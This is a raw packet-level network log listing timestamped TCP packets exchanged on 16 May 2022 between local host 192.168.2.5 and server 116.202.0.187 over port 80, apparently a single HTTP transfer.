May 16, 2022 10:29:37.945604086 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945620060 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945625067 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945636988 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945652008 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945657969 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945669889 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945684910 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945693016 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945703030 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945718050 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945724010 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945734978 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945750952 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945755005 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945769072 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945784092 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945785999 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945804119 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945817947 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945820093 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945837975 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945852995 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945856094 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945869923 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945885897 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945889950 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945902109 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945918083 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945924997 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945935965 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945951939 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945959091 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.945969105 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945985079 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.945987940 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946002007 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946017981 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946022034 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946036100 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946053028 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946057081 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946070910 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946086884 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946094990 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946103096 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946120977 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946135044 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946135998 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946152925 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946166992 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946168900 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946186066 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946201086 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946203947 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946222067 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946235895 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946238041 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946254969 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946269989 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946269989 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946285963 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946301937 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946304083 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946319103 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946335077 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946341038 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946352005 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946368933 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946372032 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946384907 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946400881 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946408987 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946417093 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946433067 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946440935 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946449995 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946465969 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946475029 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946481943 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946497917 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946499109 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946513891 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946528912 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946543932 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946558952 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946574926 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946577072 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946592093 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946608067 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946623087 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946630955 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946640015 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946655989 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946671009 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946675062 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946686983 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946702957 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946707964 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946719885 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946734905 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946743011 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946752071 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946768045 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946783066 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946789026 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946799040 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946815014 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946830034 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946846008 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946860075 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946876049 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946886063 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946892023 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946892023 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946896076 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946909904 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946926117 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946933985 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946943998 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946960926 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946965933 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.946976900 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946993113 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.946997881 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.947009087 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.947026968 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.947036982 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.947046995 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.947062969 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.947077990 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.947091103 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.947093964 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.947110891 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.947113991 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.947127104 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.947143078 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.947180033 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.964597940 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964632988 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964649916 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964665890 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964680910 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964698076 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964714050 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964729071 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964745045 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964775085 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964792013 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964792967 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.964808941 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964826107 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964842081 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964859009 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964874029 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964878082 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.964890957 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964905977 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964920998 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964937925 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964952946 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964967966 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.964972019 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.964984894 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965001106 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965017080 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965019941 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.965034008 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965045929 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.965049982 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965066910 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965078115 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.965082884 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965100050 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965107918 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.965116024 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965131998 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965133905 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.965147972 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965162992 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965178013 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965189934 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.965193987 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965210915 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965226889 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965229034 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.965243101 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965257883 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965262890 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.965275049 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965290070 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965296030 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.965306997 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965322971 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965322971 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.965338945 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965354919 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965359926 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.965377092 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965389013 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.965392113 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965410948 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965426922 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965435028 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.965442896 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965459108 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965472937 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.965475082 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965492964 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.965516090 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.965550900 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.967262030 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967288971 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967304945 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967320919 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967336893 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967351913 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967351913 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.967370033 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967379093 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.967387915 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967403889 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967420101 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967430115 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.967437029 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967454910 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967470884 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967485905 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967493057 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.967504025 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967519999 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967535019 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967545986 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.967550993 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967617035 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.967647076 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.967940092 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967959881 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967977047 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.967993021 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968003035 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968008995 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968027115 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968033075 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968044043 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968060017 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968076944 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968091965 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968101025 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968108892 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968151093 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968162060 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968178034 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968178988 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968198061 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968214989 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968226910 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968230963 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968249083 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968265057 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968271971 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968281031 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968297958 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968300104 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968310118 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968326092 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968338013 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968353987 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968369007 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968384027 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968385935 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968400955 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968415976 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968431950 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968449116 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968488932 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968529940 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968588114 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968605042 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968621016 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968636036 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968637943 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968655109 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968669891 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968686104 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968698978 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968702078 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968719006 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968734980 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968751907 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968756914 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968767881 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968785048 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968801022 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968807936 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968817949 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968835115 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968849897 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968862057 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968867064 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968883991 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968899965 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968911886 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968914986 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.968966007 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.968998909 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969011068 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969029903 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969044924 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969062090 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969077110 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969093084 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969109058 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969118118 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969125032 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969141960 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969158888 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969166994 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969173908 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969192028 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969208002 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969208002 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969223022 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969239950 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969255924 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969255924 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969273090 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969290018 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969300985 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969307899 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969325066 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969341040 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969351053 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969356060 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969373941 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969388962 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969405890 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969410896 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969423056 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969439030 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969446898 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969487906 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969506025 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969506025 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969527006 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969540119 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969544888 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969562054 CEST	80	49756	116.202.0.187	192.168.2.5
